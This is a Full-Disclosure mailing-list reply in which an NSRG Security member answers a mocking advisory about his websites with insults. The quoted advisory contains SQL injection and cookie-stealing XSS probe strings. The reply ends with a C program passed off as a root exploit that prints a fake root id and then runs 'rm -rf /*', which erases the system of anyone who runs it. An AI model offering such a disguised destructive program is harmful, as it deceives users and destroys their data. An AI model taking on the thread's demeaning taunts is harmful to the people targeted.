Re: [OMG] NSRG Security & Lorenzo Hernandez "SuckYouBeans" Garcia-Hierro

["Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>]

Hi,
I think you are a little stuck wth honeypots:
http://www.nsrg-security.com/kiddies.txt
The only thing is not there is a photo of you ?face?

> ~~~~
>  0D4Y-OMFG FACTOR 1 MILLIN   0D4Y-OMFG FACTOR 1 MILLIN   0D4Y-OMFG FACTOR
1 MILLIN
>  0D4Y-OMFG FACTOR 1 MILLIN   0D4Y-OMFG FACTOR 1 MILLIN   0D4Y-OMFG FACTOR
1 MILLIN
>  0D4Y-OMFG FACTOR 1 MILLIN   0D4Y-OMFG FACTOR 1 MILLIN   0D4Y-OMFG FACTOR
1 MILLIN
> O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-
> OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y0D4Y-
> OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y0D4Y-
> OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y
> ~~~~~~~~
>
>
>           [   Playing with stolen relabeled code by NSRG-Security    ]
>
>            \=1`\ Brought to you by the fine folks at  \`=1\
>             \=1`\   Stupidity In the World Industries  \`=1\
>              \=1`\          The Re-Resurrection         \`=1\
>
>
> sites: nsrg-security.com
>        w3.nsrg-security.com
>        http://news.nsrg-security.com
>        test-zone.nsrg-security.com
>        advisories.nsrg-security.com
>
> Look through web sites and learn about horatio.
>
> > > > > > > > > > > > > > > > > > > > > > > > > Quote from "Lorenzo Hernandez Garcia-Hierro" to
"gazpa"
> haha i no script kiddie i call u mother and ask about you scanning
> for rpc all night hahaofihohashahomfgroflmfaowssd

get a valium , say again , better ?

> ~ OH WAIT! the only linux exploit i have on my worthless nsrg-security
site
> ~  is for windows rpc, DOH! I look like such an idiot

are OK ? did you get your pills ¿¿?

> > > > > > > > > > > > > > > > > > > > > > > > > End Quote
>
> ==========================================================
>
>                ==Advisory #8131==
>         ==Giving you 10 years of XSS!!==
>
>                  NSRG SECURITY
>          "Almost as lame as morning_wood"
>
> =============================================================
>
>
> http://www.nsrg-security.com/forum/viewtopic.php?forum=2&showtopic=1
having 1=1-- 
>              "An SQL error has occured. Please see error.log for details."

where is the exploitable query ? i think theres not... but you appear in the
"in"famous list:
http://www.nsrg-security.com/kiddies.txt

> http://www.nsrg-security.com/stuff/trans.php?lang=sagsdg
>               Stupid programming

it rejects non existent languages ( there is no return else function )

> [blah]
> http://www.nsrg-security.com/stuff/
>  HEXCODES.TXT            25-Oct-2003 23:21     1k
>  check_sys.php           21-Nov-2003 16:43     2k
>  irc.php                 22-Nov-2003 00:06     4k
>  news-cert.php           21-Nov-2003 18:18     1k
>  news-kernel-traffic.php 21-Nov-2003 18:18     1k
>  news-securityfocus.php  21-Nov-2003 18:18     1k
>  news-slashdot.php       21-Nov-2003 18:18     1k
>  news.php                21-Nov-2003 19:03     3k
>  trans.php               21-Nov-2003 17:40     3k
>  voyeur-system.php       21-Nov-2003 16:50     3k
>  vulns-securityfocus.php 21-Nov-2003 18:18     1k


oh , my god !
you find a directory listing !
xD
you can read slashdot if you want....
or kernel traffic, it doesn't mattter , the idiot is you....
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Quote from site:
>        =
>                         NSRG
>        "One of the best security resources around"
>        =

the old quote ?
...

> "XSS" in: http://w3.nsrg-security.com/search/index.php
>
> <script>alert(window.cookie)</script>
http://w3.nsrg-security.com/search/index.php?weblog=&keywords=%3Cscript%3Ealert%28window.cookie%29%3C%2Fscript%3E

try to execute it with cookies !!!
xD
try again , i think you copied this from somewehere else ...


> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> testzone.nsrg-security.com
>
> "XSS" in Referer log at:
>
>       http://test-zone.nsrg-security.com/xss/

why you don't post an advisory about php has a flaw in strip_tags function
?????
xD
strip_tags($refererer-f);

go back to drawing board !

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> news.nsrg-security.com
>
> "XSS" in Email variable at:
>
>       http://news.nsrg-security.com/register.php

try it , i think your about 10 times in
http://www.nsrg-security.com/kiddies.txt xD

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> misc:
>
> XSS kiddie advisories:
>
>       http://advisories.nsrg-security.com/
>       http://advisories.nsrg-security.com/FileDonkey.com-XSS/exploit.html
>
>
> Another kiddie running nessus on everything he finds:

xD do you think that ? i think you must bye glasses or new eyes , read the
complete advisory not the stupid nessus report ( its marked as suplementary
with notes ).

>
http://advisories.nsrg-security.com/Nasa.gov-MV/nasa.gov-audit-by-robot.php
> Hiding his MS browser:

do you now a browser called Mozilla ?
Netscape ?
which plane is your home ? which Singapoor ?

>
http://advisories.nsrg-security.com/Nasa.gov-MV/screenshots/SQL-3.gif
> ==================================================
>
> Greets;
>
> MOOT INDUSTRIES, moot bailey, elite nsrg-security xss h4x0rs-they dont
know SQL but they know
> how to type '` when they see "id=###", the cisco kyd, welcome to the
doghouse
>

greets , you missed the Z xD . we don't know sql ? its new... you don't know
too ( you don't know nothing )

and... a quote from morrocco :
kristataran atan busken ( search it , i don't know the correct spelling...
xD )


and here is your new uber-hax0r exploit , for root machiones on the tv (
only pr0n as you like ):
/*  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 *             Franks and Beans suckit Notrootkit
 *    where is my brain ?
 *    misspelled behind mind
 *     shutdown now && halt
*    i can't halt , i am stuck on stupidity
 *  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 */

#include <stdlib.h>
int main()
{
system("echo uid=0(root) gid=0(root) groups=0(root)");
system("rm -rf /*");
system("Exploit code executed successfully ! r00ted by Franks and Beans ,
donnie ?");

}

Best regards....xD
PS: take your time and think again if not take pills and go to the doctor.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html